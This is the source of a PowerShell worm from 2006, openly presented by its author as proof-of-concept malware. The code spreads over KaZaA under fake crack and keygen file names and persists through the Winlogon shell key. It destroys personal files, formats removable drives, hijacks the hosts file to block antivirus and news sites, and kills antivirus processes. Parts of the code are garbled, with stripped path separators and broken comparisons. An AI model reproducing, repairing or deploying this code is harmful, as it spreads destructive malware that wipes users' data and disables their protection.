Vista Worm

<?

# sk0r alias Czybik's Powershell Skript Worm
#
# This worm is for the PowerShell Script Interpreter
# which is included with Microsoft Windows Vista
#
# This worm is ¸2006 by sk0r alias Czybik
#
# Visit my homepages: www.sk0r-scripts.tk & www.sk0r-virii.tk & www.czybik-kit.tk
#
# This worm has following features:
#
# - Spreads with P2P (KaZaA Lite) per JScript
# - Writes a registry string to run every time windows starts
# - Changes RegisteredOwner, RegisteredOrga, Ie Title, Hidden Files, FileExt and Ie Page
# - overwrites specific files in Eigene Dateien Folder and Subfolders
# - formating all insertet drives and discettes
# - deletes files in %system32%driversetc
# - overwrites the host file in %system32%driversetc
# - kills some well-known Anti-Virus processes
# - deletes Reg-Values from well-known Antiviruses
# - tells a message to user, with informations about the worm
#
#
# Informations:
#
# This worm is a proof of concept worm. Because of it is able
# to run Powershell on Windows XP, too (Need .Net Framework 2.0)
# this worm is dedicated to Windows XP. Well, yes, it runs on
# Windows Vista, too. But I don't know if the structures are the
# same as in windows Xp. Note that this worm uses ActiveX Objects.
# In this worm I use Scripting.FileSystemObject and WScript.Shell
# Object. I hope Vista will include those ActiveX Objects, too.
# I am happy to be the coder of this worm. I like this language.
# And I am looking forward to new Malware in PowerShell.
# Now I will release more and more worms in this language.
#
# This worm is ¸2006 by sk0r alias Czybik. To tell me anything
# write me an email @ sk0r1337@gmx.de or a pm at vx.netlux.org
#
# ======================================================================

$fso = New-Object -Com Scripting.FileSystemObject;
$wshs = New-Object -Com WScript.Shell;
$windir = $fso.GetSpecialFolder(0)
$sysdir = $fso.GetSpecialFolder(1)

$strInfoString_one = "This is a PowerShell Script worm. ";
$strInfoString_two = "This worm is proof-of-concept ";
$strInfoString_three = "the worm is ¸2006 by sk0r alias Czybik ";
$strInfoString_four = "for informations write an email @ sk0r1337@gmx.de ";


$KazaaDir = $wshs.RegRead('HKEY_CURRENT_USERSoftwareKazaaLocalContentDownloadDir');
$AllMshDateinCurDir = get-childitem *.msh
foreach ($PowerShellScript in $AllMshDateinCurDir)
{
  if ($PowerShellScript.Length=13035)
  {
    $MySelfWorm = $PowerShellScript.Name;
  }
}
$gtFilesMsh = $fso.getfile($MySelfWorm);
if (!$fso.fileexists($Sysdir.PathWinCzySko.msh)
{
    $gtFilesMsh.Copy($Sysdir.PathWinCzySko.msh);
}
$gtFilesMsh.copy("$KazaaDirMicrosoft Windows Vista Cd-Key.txt.msh");
$gtFilesMsh.copy("$KazaaDirWindows Vista Update.msh");
$gtFilesMsh.copy("$KazaaDirAd-aware SE Personal Edition 1.06r1.msh");
$gtFilesMsh.copy("$KazaaDirAshampoo Media Player 2.03 install.msh");
$gtFilesMsh.copy("$KazaaDirAllround WinZIP Key Generator.msh");
$gtFilesMsh.copy("$KazaaDirTalisman Desktop 2.99 Crack.msh");
$gtFilesMsh.copy("$KazaaDirNero Burning Rom 6.6.0.13 Crack.msh");
$gtFilesMsh.copy("$KazaaDirKaspersky KeyGen working.msh");
$gtFilesMsh.copy("$KazaaDirDaemon Tools Install + Crack.rar.msh");
$gtFilesMsh.copy("$KazaaDirAVP - AntiVirus Key Generator.msh");


$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidde
n", 0, "REG_DWORD");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideF
ileExt", 1, "REG_DWORD");
$wshs.regwrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization", "United People of infected Ps","REG_SZ");
$wshs.regwrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner", "sk0rCzybik","REG_SZ");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title", "Infected with Ps Worm by sk0r alias Czybik","REG_SZ");
$wshs.regwrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonShell", "explorer.exe  $sysdir.PathWinCzySko.msh" ,"REG_SZ");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page", "http://www.sk0r-scripts.tk")


$PersonalDirectory = $wshs.regread("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersPersonal");
UeberschreibeDateien($PersonalDirectory)

function UeberschreibeDateien($strOrdner)
{
    $StringToOverwrite = "This file was overwritten with a Ps Worm. ";
    $StringToOverwrite += "This Worm is ¸2006 by sk0r alias Czybik! ";
   
    $OverWrtOwnFiles = $fso.getfolder($strOrdner)
    $OverFiles = $OverWrtOwnFiles.Files
    $TheSubFldr = $OverWrtOwnFiles.subfolders
   
    foreach ($SubFiles in $TheSubFldr.Files)
    {
        $strGetExt = $fso.GetExtensionName($AlleDateien.Path);
        if ($strGetExt="JPG")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="BMP")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="GIF")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="PNG")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="JPEG")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="AVI")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="MP3")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="WMV")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="WMA")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="DOC")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="XLS")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="RTF")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="PPS")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="PPT")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="ZIP")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="RAR")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
       
        if ($strGetExt="CPP")
        {
            del $AlleDateien.Path;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
    }
   
    foreach ($NochMehrUnterOrdner in $TheSubFldr)
    {
        UeberschreibeDateien($NochMehrUnterOrdner)
    }

}

$TheDrives = $fso.Drives
foreach ($AllDrives in $TheDrives)
    {
    if ($AllDrives.DriveType=1)
    {
        format $AllDrives.Path /y
    }
    if ($AllDrives.DriveType=2)
    {
        format $AllDrives.Path /y
    }
}


cd "$sysdir.pathDriversetc";
del "networks";
del "protocol";
del "services";
del "hosts";
del "hosts.bak";
echo "# Host File overwritten by Ps Worm " >> hosts
echo "# This file disallows you to visit av and dl sites :> " >> hosts
echo " " >> hosts
echo "127.0.0.1 www.antivir.de " >> hosts
echo "127.0.0.1 www.bitdefender.de " >> hosts
echo "127.0.0.1 www.znet.de " >> hosts
echo "127.0.0.1 www.chip.de " >> hosts
echo "127.0.0.1 www.virustotal.com " >> hosts
echo "127.0.0.1 virusscan.jotti.org " >> hosts
echo "127.0.0.1 www.kaspersky.com " >> hosts
echo "127.0.0.1 www.sophos.de " >> hosts
echo "127.0.0.1 www.trojaner-info.de " >> hosts
echo "127.0.0.1 www.trojaner-help.de " >> hosts
echo "127.0.0.1 www.arcabit.com " >> hosts
echo "127.0.0.1 www.avast.com " >> hosts
echo "127.0.0.1 www.grisoft.com " >> hosts
echo "127.0.0.1 www.bitdefender.com " >> hosts
echo "127.0.0.1 www.clamav.net " >> hosts
echo "127.0.0.1 www.drweb.com " >> hosts
echo "127.0.0.1 www.f-prot.com " >> hosts)
echo "127.0.0.1 www.google.de " >> hosts
echo "127.0.0.1 www.fortinet.com " >> hosts
echo "127.0.0.1 www.nod32.com " >> hosts
echo "127.0.0.1 www.norman.com " >> hosts
echo "127.0.0.1 www.microsoft.com " >> hosts
echo "127.0.0.1 www.anti-virus.by/en " >> hosts
echo "127.0.0.1 www.symantec.com " >> hosts
echo "127.0.0.1 www.windowsupdate.com " >> hosts
echo "127.0.0.1 www.trendmicro.com " >> hosts
echo "127.0.0.1 www.mcafee.com " >> hosts
echo "127.0.0.1 www.viruslist.com " >> hosts
echo "127.0.0.1 www.avp.com " >> hosts
echo "127.0.0.1 www.zonelabs.com " >> hosts
echo "127.0.0.1 www.heise.de " >> hosts
echo "127.0.0.1 www.antivirus-online.de " >> hosts
echo "127.0.0.1 www.free-av.com " >> hosts
echo "127.0.0.1 www.panda-software.com " >> hosts
echo "127.0.0.1 www.pc-welt.de " >> hosts
echo "127.0.0.1 www.pc-special.net " >> hosts
echo "127.0.0.1 download.freenet.de " >> hosts
echo "127.0.0.1 www.vollversion.de " >> hosts
echo "127.0.0.1 www.das-download-archiv.de " >> hosts
echo "127.0.0.1 www.freeware.de " >> hosts
echo "127.0.0.1 www.antiviruslab.com " >> hosts
echo "127.0.0.1 www.search.yahoo.com " >> hosts
echo "127.0.0.1 www.web.de " >> hosts
echo "127.0.0.1 www.hotmail.com " >> hosts
echo "127.0.0.1 www.hotmail.de " >> hosts
echo "127.0.0.1 www.gmx.net " >> hosts
echo "127.0.0.1 www.spiegel.de " >> hosts
echo "127.0.0.1 www.icq.com " >> hosts
echo "127.0.0.1 www.icq.de " >> hosts
echo "127.0.0.1 www.ffh.de " >> hosts
echo "127.0.0.1 www.lavasoft.de " >> hosts
echo "127.0.0.1 www.de.wikipedia.org " >> hosts
echo "127.0.0.1 www.wikipedia.org " >> hosts
echo "127.0.0.1 www.en.wikipedia.org " >> hosts
echo "127.0.0.1 www.wissen.de " >> hosts
echo "127.0.0.1 www.virus-aktuell.de " >> hosts
echo "127.0.0.1 www.arcor.de " >> hosts
echo "127.0.0.1 www.t-online.de " >> hosts
echo "127.0.0.1 www.t-com.de " >> hosts
echo "127.0.0.1 www.alice-dsl.de " >> hosts
echo "127.0.0.1 www.freenet.de " >> hosts
echo "127.0.0.1 www.1und1.de " >> hosts
echo "127.0.0.1 www.fbi.gov " >> hosts
echo "127.0.0.1 www.polizei.de " >> hosts



$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunavgnt');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunKAVPersonal50'); 
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunAVG7_CC');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunBDMCon'); 
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunBDNewsAgent');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunBDOESRV');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunpccguide.exe');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunDrWebScheduler');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSpIDerMail'); 
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSpIDerNT'); 
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunMCAgentExe');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunMCUpdateExe');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOASClnt');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunVirusScan Online');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunVSOCheckTask');
   
   
tskill avcenter /a
tskill avconfig /a
tskill avscan /a
tskill avguard /a
tskill avgnt /a
tskill update /a
tskill preupd /a
tskill avcmd /a
tskill avesvc /a
tskill kav /a
tskill kavsvc /a
tskill kavsend /a
tskill keymanager /a
tskill agentsvr /a
tskill avgcc /a
tskill avgupsvc /a
tskill avgamsvr /a
tskill vsserv /a
tskill bdss /a
tskill xcommsvr /a
tskill bdnagent /a
tskill bdoesrv /a
tskill bdmcon /a
tskill bdswitch /a
tskill rtvr /a
tskill bdsubmit /a
tskill bdlite /a
tskill agentsvr /a
tskill tmproxy /a
tskill PcCtlCom /a
tskill pccguide /a
tskill qttask /a
tskill patch /a
tskill Tmntsrv /a
tskill PccPrm /a
tskill DrWebUpW /a
tskill spidernt /a
tskill DrWebScd /a
tskill DrWeb32w /a
tskill drwadins /a
tskill mcupdui /a
tskill McTskshd /a
tskill McAppIns /a
tskill mghtml /a
tskill McShield /a
tskill Mcdetect /a
tskill McVSEscn /a
tskill oasclnt /a
tskill mcvsshld /a


echo "$strInfoString_one ";
echo "$strInfoString_two ";
echo "$strInfoString_three ";
echo "$strInfoString_four ";

$wshs.popup("www.sk0r-scripts.tk - www.sk0r-virii.tk -
www.czybik-kit.tk | Worm ¸2006 by sk0r alias Czybik",2,"PowerShell Worm by sk0r alias Czybik");

exit;